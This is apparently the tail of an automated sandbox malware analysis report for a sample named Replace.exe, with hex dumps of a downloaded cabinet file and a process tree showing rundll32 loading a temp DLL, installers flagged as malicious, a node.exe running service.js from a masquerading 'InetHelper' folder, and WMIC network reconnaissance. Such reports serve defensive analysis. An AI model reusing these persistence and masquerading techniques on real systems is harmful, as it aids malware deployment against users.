                                                                                                                                                                                                            2024-05-01 09:09:07 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                                                                                                            Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                                                                                                            2024-05-01 09:09:07 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                                                                                                            Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:11:08:03
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\Replace.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Replace.exe"
                                                                                                                                                                                                            Imagebase:0xbb0000
                                                                                                                                                                                                            File size:36'540'866 bytes
                                                                                                                                                                                                            MD5 hash:FD5CD14325C51ECAB6A57D1D665F8852
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                            Start time:11:08:03
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:rundll32 "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
                                                                                                                                                                                                            Imagebase:0x7e0000
                                                                                                                                                                                                            File size:61'440 bytes
                                                                                                                                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                            Start time:11:08:07
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:.\run.exe
                                                                                                                                                                                                            Imagebase:0x7ff75fb90000
                                                                                                                                                                                                            File size:36'542'497 bytes
                                                                                                                                                                                                            MD5 hash:D77C3EF3EFA7E38EF91137466EEE801B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 9%, ReversingLabs
                                                                                                                                                                                                            • Detection: 7%, Virustotal, Browse
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                            Start time:11:08:08
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                            Start time:11:08:09
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2272,i,3908760233601738939,4589788007160690134,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                            Start time:11:08:16
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
                                                                                                                                                                                                            Imagebase:0x7ff6da410000
                                                                                                                                                                                                            File size:71'680 bytes
                                                                                                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                            Start time:11:08:16
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
                                                                                                                                                                                                            Imagebase:0x7e0000
                                                                                                                                                                                                            File size:61'440 bytes
                                                                                                                                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                            Start time:11:08:25
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
                                                                                                                                                                                                            Imagebase:0x7ff6da410000
                                                                                                                                                                                                            File size:71'680 bytes
                                                                                                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                            Start time:11:08:26
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
                                                                                                                                                                                                            Imagebase:0x7e0000
                                                                                                                                                                                                            File size:61'440 bytes
                                                                                                                                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                            Start time:11:08:48
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\wnsA071.tmp
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wscsu.exe /S /VERPOSTFIX=bt
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:7'055'674 bytes
                                                                                                                                                                                                            MD5 hash:7A506A2E92BC66A9F64C2333A815E97A
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            • Detection: 83%, ReversingLabs
                                                                                                                                                                                                            • Detection: 77%, Virustotal, Browse
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                            Start time:11:08:51
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                                                            Imagebase:0xed0000
                                                                                                                                                                                                            File size:4'096 bytes
                                                                                                                                                                                                            MD5 hash:E9DED10DFF258F6522FE9079ED3319CA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            • Detection: 88%, ReversingLabs
                                                                                                                                                                                                            • Detection: 73%, Virustotal, Browse
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                            Start time:11:08:51
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:6'887'560 bytes
                                                                                                                                                                                                            MD5 hash:5F40521D2E1082FE1C734610C4A83911
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                            • Detection: 0%, Virustotal, Browse
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                            Start time:11:08:52
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                            Start time:11:08:52
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                            Start time:11:08:56
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                            Start time:11:08:56
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                            Start time:11:08:57
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wscsu.exe /S /VERPOSTFIX=bt
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:7'055'674 bytes
                                                                                                                                                                                                            MD5 hash:7A506A2E92BC66A9F64C2333A815E97A
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            • Detection: 83%, ReversingLabs
                                                                                                                                                                                                            • Detection: 77%, Virustotal, Browse
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                            Start time:11:08:57
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" St0P
                                                                                                                                                                                                            Imagebase:0xed0000
                                                                                                                                                                                                            File size:4'096 bytes
                                                                                                                                                                                                            MD5 hash:E9DED10DFF258F6522FE9079ED3319CA
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                            Start time:11:09:00
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                                                            Imagebase:0x570000
                                                                                                                                                                                                            File size:4'096 bytes
                                                                                                                                                                                                            MD5 hash:E9DED10DFF258F6522FE9079ED3319CA
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                            Start time:11:09:00
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:6'887'560 bytes
                                                                                                                                                                                                            MD5 hash:5F40521D2E1082FE1C734610C4A83911
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                            Start time:11:09:01
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                            Start time:11:09:04
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wscsu.exe /S /VERPOSTFIX=bt
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:7'055'674 bytes
                                                                                                                                                                                                            MD5 hash:7A506A2E92BC66A9F64C2333A815E97A
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            • Detection: 83%, ReversingLabs
                                                                                                                                                                                                            • Detection: 77%, Virustotal, Browse
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                            Start time:11:09:04
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                                                            Imagebase:0x570000
                                                                                                                                                                                                            File size:4'096 bytes
                                                                                                                                                                                                            MD5 hash:E9DED10DFF258F6522FE9079ED3319CA
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                            Start time:11:09:04
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:6'887'560 bytes
                                                                                                                                                                                                            MD5 hash:5F40521D2E1082FE1C734610C4A83911
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                            Start time:11:09:04
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" St0P
                                                                                                                                                                                                            Imagebase:0x570000
                                                                                                                                                                                                            File size:4'096 bytes
                                                                                                                                                                                                            MD5 hash:E9DED10DFF258F6522FE9079ED3319CA
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                            Start time:11:09:05
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                                                            Imagebase:0xfe0000
                                                                                                                                                                                                            File size:4'096 bytes
                                                                                                                                                                                                            MD5 hash:E9DED10DFF258F6522FE9079ED3319CA
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                            Start time:11:09:05
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:6'887'560 bytes
                                                                                                                                                                                                            MD5 hash:5F40521D2E1082FE1C734610C4A83911
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                            Start time:11:09:07
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                            Start time:11:09:08
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                            Start time:11:09:08
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
